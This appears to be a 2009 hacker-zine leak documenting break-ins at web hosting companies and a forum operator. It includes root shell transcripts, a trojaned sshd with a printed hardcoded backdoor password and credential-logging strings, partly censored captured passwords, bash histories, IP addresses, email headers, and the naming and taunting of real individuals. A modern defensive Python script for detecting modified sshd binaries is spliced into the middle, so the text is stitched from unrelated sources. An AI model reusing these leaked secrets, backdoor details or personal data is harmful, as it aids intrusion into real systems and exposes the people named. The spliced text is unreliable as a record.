maraka:x:513:513::/home/maraka:/usr/local/cpanel/bin/noshell
root@light [/home]# 


root@light [~]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.181  Bcast:66.197.170.191  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:66876060 errors:0 dropped:0 overruns:0 frame:0
          TX packets:81485342 errors:0 dropped:1 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:652037555 (621.8 MiB)  TX bytes:1600708482 (1.4 GiB)
          Interrupt:16 Base address:0xd000 

eth0:1    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.182  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:2    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.183  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:3    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.185  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:4    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.186  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

eth0:5    Link encap:Ethernet  HWaddr 00:50:8D:C2:F0:C9  
          inet addr:66.197.170.184  Bcast:66.197.170.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:16 Base address:0xd000 

gre0      Link encap:UNSPEC  HWaddr 00-00-00-00-FF-00-00-00-00-00-00-00-00-00-00-00  
          NOARP  MTU:1476  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:38383139 errors:0 dropped:0 overruns:0 frame:0
          TX packets:38383139 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:3605264865 (3.3 GiB)  TX bytes:3605264865 (3.3 GiB)

tunl0     Link encap:IPIP Tunnel  HWaddr   
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

root@light [~]# cat /var/named/ownage.net.db
; Modified by Web Host Manager
; Zone File for ownage.net
$TTL 14400
@       86400   IN      SOA     dns.vitalspeeds.com.    support.vitalspeeds.com.        (
                                        2006111702
                                        86400
                                        7200
                                        3600000
                                        86400
                                        )

ownage.net.     86400   IN      NS      dns.vitalspeeds.com.
ownage.net.     86400   IN      NS      ns2.vitalspeeds.com.


ownage.net.     14400   IN      A       72.20.28.204

localhost.ownage.net.   14400   IN      A       127.0.0.1

ownage.net.     14400   IN      MX      0       ownage.net.

mail    14400   IN      CNAME   ownage.net.
www     14400   IN      CNAME   ownage.net.
ftp     14400   IN      CNAME   ownage.net.
absolute.ownage.net.    14400   IN      A       72.20.28.205
talk.about.ownage.net.  14400   IN      A       72.20.18.131
complete.ownage.net.    14400   IN      A       72.20.28.206




_______         _______   .________
\   _  \ ___  __\   _  \  |   ____/
/  /_\  \\  \/  /  /_\  \ |____  \ 
\  \_/   \>    <\  \_/   \/       \
 \_____  /__/\_ \\_____  /______  /
       \/      \/      \/       \/ 
                __                     .__          __  .__                      
  _____ _____  |  | ______  __________ |  |  __ ___/  |_|__| ____   ____   ______
 /     \\__  \ |  |/ /  _ \/  ___/  _ \|  | |  |  \   __\  |/  _ \ /    \ /  ___/
|  Y Y  \/ __ \|    <  <_> )___ (  <_> )  |_|  |  /|  | |  (  <_> )   |  \\___ \ 
|__|_|  (____  /__|_ \____/____  >____/|____/____/ |__| |__|\____/|___|  /____  >
      \/     \/     \/         \/                                      \/     \/ 
          __________                _________              
          \______   \_______  ____ /   _____/ ____   ____  
  ______   |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 /_____/   |    |     |  | \(  <_> )        \  ___/\  \___ 
           |____|     |__|   \____/_______  /\___  >\___  >
                                          \/     \/     \/ 


Delivered-To: glafkos@gmail.com
Received: by 10.223.117.209 with SMTP id s17cs437044faq;
        Thu, 2 Jul 2009 13:31:48 -0700 (PDT)
Received: by 10.224.67.129 with SMTP id r1mr663571qai.234.1246566706699;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Return-Path: 
Received: from blu0-omc4-s21.blu0.hotmail.com (blu0-omc4-s21.blu0.hotmail.com [65.55.111.160])
        by mx.google.com with ESMTP id 2si5595246yxe.16.2009.07.02.13.31.45;
        Thu, 02 Jul 2009 13:31:46 -0700 (PDT)
Received-SPF: pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) client-ip=65.55.111.160;
Authentication-Results: mx.google.com; spf=pass (google.com: domain of glafk0s@hotmail.com designates 65.55.111.160 as permitted sender) smtp.mail=glafk0s@hotmail.com
Received: from BLU123-W9 ([65.55.111.135]) by blu0-omc4-s21.blu0.hotmail.com with Microsoft SMTPSVC(6.0.3790.3959);
	 Thu, 2 Jul 2009 13:31:22 -0700
Message-ID: 
Return-Path: glafk0s@hotmail.com
Content-Type: multipart/alternative;
	boundary="_817cc510-a5cf-4a68-bec3-2a43760f95ae_"


X-Originating-IP: [188.51.85.13] // You still have a lot to learn :)


From: james knuth 
To: , , ,
	, , ,
	, ,
	, , ,
	, ,
	, , ,
	, ,
	, ,
	, ,
	, , ,
	
Subject: Makosolutions, LLC
Date: Thu, 2 Jul 2009 22:31:22 +0200
Importance: Normal
MIME-Version: 1.0
X-OriginalArrivalTime: 02 Jul 2009 20:31:22.0341 (UTC) FILETIME=[10245150:01C9FB54]

MakoSolutions, LLC // The remaining content of this email has been provided to the proper authorities
    - Hacked.

I will keep this short and simple, you hosted someone I want down and I decided to take down your company 
and publish your customers information for that.

// This is not your game anymore "Faisal Hourani". It seems that your anti-sec ideals were just excuses..


HOOKOUT: 67.225.142.98 0x3aownt:rKDcb-54ZJ

                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          |
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp i686 ]

 08:24:44 up 519 days, 11:20,  3 users,  load average: 0.05, 0.10, 0.09
makos2   pts/1        61.17.231.6      Fri Jun 26 08:12   still logged in   
makos2   pts/3        61.17.231.6      Fri Jun 26 04:10 - 04:25  (00:15)    
makos2   pts/7        61.17.231.6      Fri Jun 26 04:09 - 04:09  (00:00)    
makos2   pts/5        61.17.231.6      Fri Jun 26 03:58 - 04:09  (00:11)    
makos2   pts/4        61.17.231.6      Fri Jun 26 03:54   still logged in   

wtmp begins Tue Jun  2 01:09:06 2009
Owned[DC]:[~]# date
Fri Jun 26 08:26:44 EDT 2009
Owned[DC]:[~]# uname -a
Linux puma.makosolutions.net 2.6.9-67.0.1.ELsmp #1 SMP Wed Dec 19 16:01:12 EST 2007 i686 athlon i386 GNU/Linux
Owned[DC]:[~]# 


Owned[DC]:[~]# cd /var/run/ssh
Owned[DC]:[/var/run]# gcc -o decode decode.c 
Owned[DC]:[/var/run]# ./decode ssh.old 
HOOKOUT: 67.225.142.98 root:_censored_
HOOKIN: root:_censored_
HOOKOUT: 66.96.220.213 root:_censored_
.
.
.
HOOKIN: makos2:_censored_
HOOKOUT: 64.191.116.202 root:_censored_

Owned[DC]:[/var/run]# w
 08:32:59 up 519 days, 11:28,  3 users,  load average: 0.23, 0.22, 0.13
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
makos2   pts/0    61.17.231.6      03:53    3:54   0.13s  0.00s sshd: makos2 [priv]
makos2   pts/1    61.17.231.6      08:12    6.00s  0.06s  0.01s sshd: makos2 [priv]
makos2   pts/4    61.17.231.6      03:54   18:40   0.02s  0.01s sshd: makos2 [priv]
Owned[DC]:[/var/run]# 

Owned[DC]:[/var/run]# cat /etc/shadow

Owned[DC]:[/backup]# cat ~/.bash_history
ssh 64.191.54.229 -l butts 
#1244614734
ssh 64.191.54.229 -l butts
#1244651529
ssh butts@64.191.54.229
#1244644856
ssh 66.96.220.213 -l makosolutions 
#1244644866
ssh 66.96.220.213 -l makosolutions -p 2222 
#1244645088
ssh 66.96.220.213 -l mako -p 2222
#1244650823
top -c
#1244651468
ssh 66.96.220.213
#1244651606
ssh 66.96.220.213 -l makosolutions 
#1244659374
ifconfig | grep 67.225.142.98
#1244659384
ssh -l butts server.holeinthewallhosting.com
#1244659474
nmap server.holeinthewallhosting.com
#1244659875
ssh -l butts server.holeinthewallhosting.com
#1244659891
ssh -l butts 64.191.54.229
#1244677757
ssh -l  makosolutions  66.96.220.213 // infosec.org.uk
#1244810932
exit
#1244944507
ssh 64.191.54.229 -l butts
#1244971944
ssh -l butts 64.191.54.229
#1245004682
ssh 64.191.116.203
#1245013655
exit
#1245067142
ssh 66.96.220.213
#1245062070
ssh 66.96.220.213
#1245074394
ssh 64.191.116.203
#1245076716
exit
#1245058974
ssh 66.96.220.213
#1245082594
ssh 64.191.116.203
#1245141381
grep nukelar.reality-matrix.org /etc/trueuserdomains 
#1245141388
grep nukelar.reality-matrix.org /etc/userdomains 
#1245141593
ssh 64.191.116.203
#1245161918
ssh 66.96.220.213
#1245161939
telnet 66.96.220.213 22
#1245161953
telnet 66.96.220.213 53
#1245161969
nmap 66.96.220.213
#1245162042
ssh 66.96.220.213 -p 80
#1245147550
ssh 64.191.116.203
#1245184460
ssh 66.96.220.213
#1245199770
ssh -l makosolutions 66.96.220.213 
#1245318670
vi /etc/csf/csf.denyip
#1245318687
ssh 66.96.220.213
#1245318707
ssh root@66.96.220.213
#1245318749
ssh mako@66.96.220.213 -p2222
#1245318770
ssh mako@66.96.220.213 -p 2222
#1245318842
ssh mako@66.96.220.213 -p2222
#1245316906
ssh 66.7.198.124
#1245317031
ssh 66.7.198.124
#1245317159
ssh 66.96.220.213
#1245318179
ssh  66.96.220.213
#1245319038
ssh 67.225.159.152 
#1245319073
ssh 67.225.159.152 -p22
#1245319077
ssh 67.225.159.152 -p 22
.
.
.
csf -l | grep 66.96.211.181
#1245999632
apf
#1246000060
ssh 66.96.211.181 -l root
#1246000637
grep 66.96.211.181 /var/log/messages
#1246002631
cat /usr/local/psa/version
#1246002640
ls /usr/local/psa/version
#1246015247
ls /usr/local/psa/version
#1245998530
ssh 64.191.72.85
#1245998556
telnet 64.191.72.85 25
#1245998595
vzlist -a
#1246001328
ssh 64.191.72.85

Owned[DC]:[/backup]# df -h
Filesystem            Size  Used Avail Use% Mounted on
/dev/sda7             2.0G  426M  1.5G  23% /
/dev/sdb1             147G   61G   79G  44% /backup
/dev/sda1            1012M   46M  915M   5% /boot
none                  2.0G     0  2.0G   0% /dev/shm
/dev/sda8             121G   32G   83G  28% /home
/dev/sda6             2.0G   37M  1.9G   2% /tmp
/dev/sda2             9.9G  5.6G  3.9G  60% /usr
/dev/sda5             9.9G  2.1G  7.3G  23% /var
/tmp                  2.0G   37M  1.9G   2% /var/tmp
Owned[DC]:[/backup]# 

Owned[DC]:[/etc/pam.d]# cat sshd 
#%PAM-1.0
auth       required     pam_stack.so service=system-auth
auth       required     pam_nologin.so
account    required     pam_stack.so service=system-auth
password   required     pam_stack.so service=system-auth
session    required     pam_stack.so service=system-auth
session    required     pam_loginuid.so

auth       required     pam_shells.so 

Owned[DC]:[/var/run]# hostname
puma.makosolutions.net
Owned[DC]:[/var/run]# 

Owned[DC]:[~]# lsof -i TCP:22
COMMAND   PID   USER   FD   TYPE    DEVICE SIZE NODE NAME
sshd    17433   root    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd    17441 makos2    3u  IPv6 791605626       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:60137 (ESTABLISHED)
sshd    21409   root    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd    21412 makos2    3u  IPv6 791273811       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:46198 (ESTABLISHED)
sshd    26799   root    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
sshd    26806 makos2    3u  IPv6 791290938       TCP puma.makosolutions.net:ssh->ABTS-KK-dynamic-175.123.172.122.airtelbroadband.in:52436 (ESTABLISHED)
ssh     26887   root    3u  IPv4 791291132       TCP puma.makosolutions.net:42625->serv.localhost:ssh (ESTABLISHED)
sshd    29596   root    3u  IPv6 791533593       TCP puma.makosolutions.net:ssh->188.51.85.13:34957 (ESTABLISHED) 
// RoMeO logged in just before the rm -rf / of makosolutions.com
sshd    30850   root    3u  IPv6 783032196       TCP *:ssh (LISTEN)



_______         _______    ________
\   _  \ ___  __\   _  \  /  _____/
/  /_\  \\  \/  /  /_\  \/   __  \ 
\  \_/   \>    <\  \_/   \  |__\  \
 \_____  /__/\_ \\_____  /\_____  /
       \/      \/      \/       \/ 
.__           .__         .__        __  .__                          .__  .__   
|  |__   ____ |  |   ____ |__| _____/  |_|  |__   ______  _  _______  |  | |  |  
|  |  \ /  _ \|  | _/ __ \|  |/    \   __\  |  \_/ __ \ \/ \/ /\__  \ |  | |  |  
|   Y  (  <_> )  |_\  ___/|  |   |  \  | |   Y  \  ___/\     /  / __ \|  |_|  |__
|___|  /\____/|____/\___  >__|___|  /__| |___|  /\___  >\/\_/  (____  /____/____/
     \/                 \/        \/          \/     \/             \/           
.__                    __  .__                          
|  |__   ____  _______/  |_|__| ____    ____            
|  |  \ /  _ \/  ___/\   __\  |/    \  / ___\    ______ 
|   Y  (  <_> )___ \  |  | |  |   |  \/ /_/  >  /_____/ 
|___|  /\____/____  > |__| |__|___|  /\___  /           
     \/           \/               \//_____/            
__________                _________              
\______   \_______  ____ /   _____/ ____   ____  
 |     ___/\_  __ \/  _ \\_____  \_/ __ \_/ ___\ 
 |    |     |  | \(  <_> )        \  ___/\  \___ 
 |____|     |__|   \____/_______  /\___  >\___  >
                                \/     \/     \/ 


64.191.54.229 0x3aownt:DlE46Y8KpH
                +----------------------------[ Owned ]----------------------------+
                |          Hack everyone you can and then hack some more          |
                |                           Owned[DC] v2                          |
                |                   _______ . _______ . _______                   |
                |             Get in as anonymous, Leave with no trace.           |
                |                                                                 |
                +-----------------------------------------------------------------+
         [ Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 i686 ]

 11:12:13 up 78 days, 17:02,  0 users,  load average: 1.73, 2.17, 2.23
mrich    pts/0        75-28-177-133.li Thu Jun 25 22:40 - 22:47  (00:06)    
jayzer   pts/1        cpe-76-183-78-13 Thu Jun 25 00:45 - 00:49  (00:04)    
fmystic  pts/1        cpe-71-67-100-61 Wed Jun 24 23:27 - 00:14  (00:46)    
butts    pts/0        puma.makosolutio Wed Jun 24 21:47 - 02:54  (05:07)    
bwc05    pts/1        host-136-245.flt Wed Jun 24 00:18 - 00:18  (00:00)    

wtmp begins Wed Apr 29 04:10:02 2009
root@server [~]# 


root@server [~]# lsof -i -n | grep ssh
sshd      13173     root    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd      13176      hsp    3u  IPv6 496962909       TCP 64.191.54.229:ssh->68.56.217.209:63552 (ESTABLISHED)
sshd      13285     root    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd      13287 stephenm    3u  IPv6 496964091       TCP 64.191.54.229:ssh->68.56.217.209:4125 (ESTABLISHED)
sshd      13287 stephenm    7u  IPv4 505107114       TCP 64.191.54.229:53259->192.168.1.121:icslap (SYN_SENT)
sshd      13287 stephenm    8u  IPv4 505106277       TCP 64.191.54.229:38749->192.121.86.4:http (SYN_SENT)
sshd      30096     root    3u  IPv6 485663697       TCP *:ssh (LISTEN)
root@server [~]# 


root@server [/var/run]# gcc -o decode decode.c 
root@server [/var/run]# ./decode ssh.old 
HOOKIN: falados:$.lWKq._censored_
HOOKIN: smithah:_censored_
.
.
.
HOOKIN: karsh:vnm_censored_
HOOKIN: karsh:vnm_censored_
HOOKIN: smithah:Coverfir_censored_
HOOKIN: karsh:vn_censored_
HOOKIN: mrich:t23_censored_
root@server [/var/run]# 

root@server [/var/run]# hostname
server.holeinthewallhosting.net
root@server [/var/run]# uname -a
Linux server.holeinthewallhosting.net 2.6.18-92.1.10.el5 #1 SMP Tue Aug 5 07:41:53 EDT 2008 i686 i686 i386 GNU/Linux
root@server [/var/run]# date
Fri Jun 26 11:16:32 CDT 2009
root@server [/var/run]# ifconfig -a
eth0      Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.229  Bcast:64.191.54.239  Mask:255.255.255.240
          inet6 addr: fe80::219:d1ff:fefb:459b/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:739777531 errors:0 dropped:0 overruns:0 frame:0
          TX packets:970111216 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:587506583 (560.2 MiB)  TX bytes:4170982921 (3.8 GiB)
          Interrupt:217 Base address:0x2000 

eth0:1    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.230  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:2    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.231  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:3    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.232  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:4    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.54.233  Bcast:64.191.54.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:5    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.197  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:6    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.198  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:7    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.199  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:8    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.200  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:9    Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.201  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:10   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.202  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:11   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.203  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:12   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.204  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:13   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.205  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth0:14   Link encap:Ethernet  HWaddr 00:19:D1:FB:45:9B  
          inet addr:64.191.36.206  Bcast:64.191.36.207  Mask:255.255.255.240
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          Interrupt:217 Base address:0x2000 

eth1      Link encap:Ethernet  HWaddr 00:50:04:6F:DA:43  
          BROADCAST MULTICAST  MTU:1500  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)
          Interrupt:217 Base address:0x8000 

lo        Link encap:Local Loopback  
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:35636410 errors:0 dropped:0 overruns:0 frame:0
          TX packets:35636410 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:1453567506 (1.3 GiB)  TX bytes:1453567506 (1.3 GiB)

sit0      Link encap:IPv6-in-IPv4  
          NOARP  MTU:1480  Metric:1
          RX packets:0 errors:0 dropped:0 overruns:0 frame:0
          TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0 
          RX bytes:0 (0.0 b)  TX bytes:0 (0.0 b)

root@server [/var/run]# 


root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 DlE46Y8KpH
Rhosts authentication refused for %.100s: bad ownership or modes for home directory.
Rhosts authentication refused for %.100s: bad modes for %.200s
Server has been configured to ignore %.100s.
Accepted host %s ip %s client_user %s server_user %s
HOOKIN: %s:%s
DlE46Y8KpH
root@server [/var/run]# 

root@server [/var/run]# strings /usr/sbin/sshd | grep -B 5 0x3
check_key_in_hostfiles: key %s for %s
auth1.c
sending challenge '%s'
 ruser %.100s
do_authloop: BN_new failed
0x3aownt
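
Added example, not part of the original log: a defender-side version of the strings check above that compares a suspect sshd against a known-good build of the same version and classifies whatever strings were added. The sample binaries are constructed inline from strings shown on this page; the function names and the two heuristics are assumptions of this sketch, and the reference copy must come from a trusted package source, not from the host under investigation.

```python
import hashlib
import re

def extract_strings(blob, min_len=4):
    """Rough equivalent of strings(1): runs of printable ASCII >= min_len."""
    pattern = re.compile(rb"[\x20-\x7e]{%d,}" % min_len)
    return [m.group().decode("ascii") for m in pattern.finditer(blob)]

# Heuristic 1 (assumption): a format string that joins two unbounded %s with
# a colon is what a user:password logger needs, like "HOOKIN: %s:%s" above.
CRED_PAIR = re.compile(r"%s\s*:\s*%s")
# Heuristic 2 (assumption): a short bare token mixing letters and digits is a
# candidate hardcoded secret, like the master password found above.
BARE_TOKEN = re.compile(r"[A-Za-z0-9]{8,16}")

def classify(s):
    if CRED_PAIR.search(s):
        return "credential-pair format string"
    if BARE_TOKEN.fullmatch(s) and re.search(r"[A-Za-z]", s) and re.search(r"\d", s):
        return "bare alphanumeric token"
    return "unexplained string"

def scan(suspect, reference):
    """Return (modified, findings).

    modified: True when the SHA-256 digests differ. This is the primary
              signal and it also catches code-only patches that add no strings.
    findings: strings present in the suspect but absent from the reference,
              in file order, each with a classification.
    """
    modified = hashlib.sha256(suspect).digest() != hashlib.sha256(reference).digest()
    known = set(extract_strings(reference))
    findings, seen = [], set()
    for s in extract_strings(suspect):
        if s in known or s in seen:
            continue
        seen.add(s)
        findings.append((s, classify(s)))
    return modified, findings

# Constructed sample data: stock sshd strings as they appear in the output
# above, NUL-separated the way string tables sit in a real binary.
STOCK = [
    b"Server has been configured to ignore %.100s.",
    b"Accepted host %s ip %s client_user %s server_user %s",
    b"sending challenge '%s'",
    b"do_authloop: BN_new failed",
]
# Constructed sample data: the three strings the log shows were added.
ADDED = [b"HOOKIN: %s:%s", b"DlE46Y8KpH", b"0x3aownt"]

REFERENCE = b"\x7fELF\x00" + b"\x00".join(STOCK) + b"\x00"
SUSPECT = (b"\x7fELF\x00"
           + b"\x00".join(STOCK[:2] + ADDED[:2] + STOCK[2:] + ADDED[2:])
           + b"\x00")

if __name__ == "__main__":
    modified, findings = scan(SUSPECT, REFERENCE)
    print("digest differs from reference:", modified)
    for text, label in findings:
        print(f"  {label:32} {text!r}")
```

A digest mismatch alone is enough to treat the binary as untrusted; the string diff only helps explain what was changed and which credentials need rotating.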

root@server [~]# cat .my.cnf 
[client]
user="root"
pass=",a5.z_censored_"
root@server [~]# 

root@server [/tmp]# cd /var/run/
root@server [/var/run]# ls
./                 couriersslcache        dbus/               mdmpd/           pm/                 saslauthd/       tailwatchd.pid
../                cpanellogd.pid         eximstats/          messagebus.pid   pop3d.pid           screen/          upcp.pid
acpid.socket=      cpdavd.pid             ftpd.sock=          named/           pop3d.pid.lock      sdp=             utmp
audispd_events=    cphulkd_detector.pid   haldaemon.pid       named.pid@       pop3d-ssl.pid       setrans/         winbindd/
auditd.pid         cphulkd_processor.pid  imapd.pid           netreport/       pop3d-ssl.pid.lock  setroubleshoot/  wpa_supplicant/
autofs.fifo-misc|  cphulkd.sock=          imapd.pid.lock      NetworkManager/  ppp/                spamd.pid
autofs.fifo-net|   cpsrvd.pid             imapd-ssl.pid       nscd/            pure-authd.pid      sshd.pid
avahi-daemon/      crond.pid              imapd-ssl.pid.lock  pcscd.comm=      pure-ftpd/          ssh.old
chkservd/          cups/                  klogd.pid           pcscd.pid        pure-ftpd.pid       sudo/
console/           cupsd.pid              mdadm/              pcscd.pub        rpc.statd.pid       syslogd.pid
root@server [/var/run]# cd screen/
root@server [/var/run/screen]# ls
./  ../  S-root/
root@server [/var/run/screen]# cd S-root/
root@server [/var/run/screen/S-root]# ls
./  ../  13472.pts-0.server|
root@server [/var/run/screen/S-root]# cat 13472.pts-0.server


root@server [/var/run/screen/S-root]# ls
./  ../  13472.pts-0.server|
root@server [/var/run/screen/S-root]# cd ..
root@server [/var/run/screen]# ls
./  ../  S-root/
root@server [/var/run/screen]# ps -aux | grep -r screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root     25085  0.0  0.0   3920   700 pts/1    S+   11:27   0:00 grep -r screen
root@server [/var/run/screen]# ps -aux | grep -i screen
Warning: bad syntax, perhaps a bogus '-'? See /usr/share/doc/procps-3.2.7/FAQ
root     13472  0.0  0.0   5056  1064 ?        Ss   Jun10   0:00 SCREEN
root     25147  0.0  0.0   3920   680 pts/1    R+   11:27   0:00 grep -i screen
root@server [/var/run/screen]# 


_______         ________________ 
\   _  \ ___  __\   _  \______  \
/  /_\  \\  \/  /  /_\  \  /    /
\  \_/   \>    <\  \_/   \/    / 
 \_____  /__/\_ \\_____  /____/  
       \/      \/      \/        
    .___             __           .__            .___                 
  __| _/____ _______|  | __ _____ |__| ____    __| _/_______          
 / __ |\__  \\_  __ \  |/ //     \|  |/    \  / __ |\___   /   ______ 
/ /_/ | / __ \|  | \/    <|  Y Y  \  |   |  \/ /_/ | /    /   /_____/ 
\____ |(____  /__|  |__|_ \__|_|  /__|___|  /\____ |/_____ \          
     \/     \/           \/     \/        \/      \/      \/          
          ____________   .________
_________/ ____\   _  \  |   ____/
\___   /\   __\/  /_\  \ |____  \ 
 /    /  |  |  \  \_/   \/       \
/_____ \ |__|   \_____  /______  /
      \/              \/       \/ 


                                           |
                                       \       /            _\/_
     darkmindz                           .-'-.              //o\  _\/_
                                    --  /     \  --           |   /o\\
  ^^~^~^~^~^~^~^~^~~^~^~^~^~^~^~^~^~^~^-=======-~^~~^^~~^~^~^~|~~^~^|^~`
     We eat the night, we drink the time                            |
       Make our dreams come true
         And hungry eyes are passing by
           On streets we call the zoo

Darkmindz.com was just another "haxor" AKA idiot breeding ground forum run by
the infamous Saudi named RoMeO. Fortunately, due to the recent events, RoMeO
decided to kill his site and handle because he was sloppy & cocky enough to link
his anti-sec activities with his public internet "life". This has spared us the
trouble of needing to rm -rf /* his shit, so thx RoMeO, hope we can be friends.
We didn't want a good hax.log to go to waste so we decided to publish darkmindz
anyways.

RoMeO is a blackhat wannabe and gave us good lulz with astalavista, props to
that, but who the fuck is/was ssanz anyway and what's the point of spreading
